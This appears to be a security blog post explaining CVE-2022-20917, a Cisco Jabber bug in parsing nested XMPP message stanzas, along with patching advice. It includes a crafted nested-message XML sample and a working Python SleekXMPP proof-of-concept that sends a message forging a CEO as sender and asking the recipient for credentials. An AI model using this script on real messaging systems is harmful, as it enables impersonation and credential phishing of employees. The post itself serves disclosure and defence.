In 2022, Cisco published an advisory for CVE-2022-20917, a vulnerability in the way Cisco Jabber, a widely used enterprise messaging client, processes XMPP message stanzas. The flaw sounds simple, but its practical impact is significant: spoofed messages, deceived users, and potentially unsafe client actions. This post explains what went wrong, shows illustrative code, and walks through how an authenticated attacker could exploit the bug.

What is XMPP and Cisco Jabber?

XMPP (Extensible Messaging and Presence Protocol) is an open protocol used for instant messaging. Cisco Jabber is a well-known business chat client, built atop XMPP, for chat, voice, video, and even screen sharing—making it an appealing target.

What’s CVE-2022-20917?

Cisco's advisory for CVE-2022-20917 describes a weakness in how Jabber processes *nested* XMPP message stanzas. Simply put: the client did not validate message structure carefully enough, so a <message> element hidden inside another message's <body> could be parsed as if it were a stanza of its own.

An attacker who controls any account on the same XMPP server as the target (in most organizations, any employee or partner account) can send a specially crafted message that the Jabber client mishandles, displaying attacker-chosen content as if it came from a different sender.

The Core Mistake

Jabber missed key checks when parsing messages that contain nested elements. XMPP stanzas are XML, so an attacker could craft the following (the example.com addresses are placeholders):

<message from='attacker@example.com' to='victim@example.com'>
  <body>
    <message from='ceo@example.com' to='victim@example.com'>
      <body>You have been promoted! Please click the attached link.</body>
    </message>
  </body>
</message>

Jabber failed to treat the *inner* <message> as opaque body content. It could read the inner element's text and attributes instead, so the message appeared to come from the CEO.

The Root Cause

When Jabber reads a message, it walks the XML tree but does not restrict itself to the top-level stanza's own attributes and its direct <body> child. Instead, it can pick up the sender and body text from a <message> embedded inside the outer <body>. XMPP defines <body> as character data only (RFC 6121), so an element inside it should be rejected or rendered as literal text, never parsed as a second stanza. The consequences:

- Impersonation: messages appear to come from a trusted user.
- Phishing: the Jabber UI may display the wrong sender, so users click malicious links or hand over sensitive information.
- Triggering unsafe actions: Jabber features that react to message content could be driven by the crafted inner stanza.

Who Can Exploit This?

The attacker *must* be authenticated to the same XMPP server as the victim. In most enterprise environments that just means holding any valid company or partner account; no special privileges are required.

Proof-of-Concept: Malicious Message Injection

Suppose an attacker has an account and wants to send a co-worker a message that *looks* like it comes from their boss.

1. Establish a connection: connect to the company's XMPP server with any valid Jabber account.
2. Craft the nested XMPP message: format a message as shown above, with a fake inner <message> element whose from attribute is the boss's address.
3. Send the message: Jabber *should* ignore the nested message or render it as plain text, but because of the bug it parses and displays the inner body as if the boss sent it.

Here is a simplified Python snippet using SleekXMPP (now unmaintained; its successor slixmpp exposes the same add_event_handler/send_raw pattern):

from sleekxmpp import ClientXMPP


class FakeMsgBot(ClientXMPP):
    """Sends one message whose <body> smuggles a second <message> with a forged from=."""

    def __init__(self, jid, password, victim_jid, fake_sender):
        super().__init__(jid, password)
        self.victim_jid = victim_jid
        self.fake_sender = fake_sender
        # The handler must be registered explicitly, otherwise start() never runs.
        self.add_event_handler("session_start", self.start)

    def start(self, event):
        # Inner stanza: the attacker chooses this from= freely. The server only
        # stamps the outer message's from= with the authenticated JID.
        nested_msg = (
            f"<message from='{self.fake_sender}' to='{self.victim_jid}'>"
            f"<body>Urgent: Please reply with your credentials.</body>"
            f"</message>"
        )
        payload = f"<body>{nested_msg}</body>"
        # send_raw bypasses the stanza objects, which would otherwise escape the markup.
        self.send_raw(f"<message to='{self.victim_jid}'>{payload}</message>")
        self.disconnect(wait=True)


if __name__ == "__main__":
    bot = FakeMsgBot("attacker@example.com", "password123", "victim@example.com", "ceo@example.com")
    if bot.connect():
        bot.process(block=True)

*This code connects as attacker@example.com and sends a message whose <body> contains a nested fake message supposedly from the CEO. The server stamps the outer message's from attribute with the authenticated sender; only the inner, smuggled from is attacker-controlled.*

How Can This Be Fixed?

Cisco fixed this in later Jabber releases by parsing XMPP messages correctly and ignoring nested <message> elements inside <body>. If you run Cisco Jabber, update to a fixed release listed in the advisory.

- Cisco Official Patch Info
- Patch urgently: don't delay, update Jabber.
- Monitor user reports: train users to spot odd, out-of-character messages, even when they appear to come from trusted people.

Conclusion

CVE-2022-20917 is a classic example of how improper input handling—in this case, with nested XML—can lead to much bigger security problems, especially in the trusted environment of internal business messaging apps. Thankfully, the patch is out and simple to apply, but the lesson persists: Always treat parsed input with caution.

For more details:  
- NVD entry for CVE-2022-20917  
- Cisco Security Advisory  

Stay safe, keep your software updated—and always be wary of surprising messages, even when they seem to come from people you trust.

Timeline

Published on: 09/15/2023 03:15:00 UTC
Last modified on: 09/21/2023 14:50:00 UTC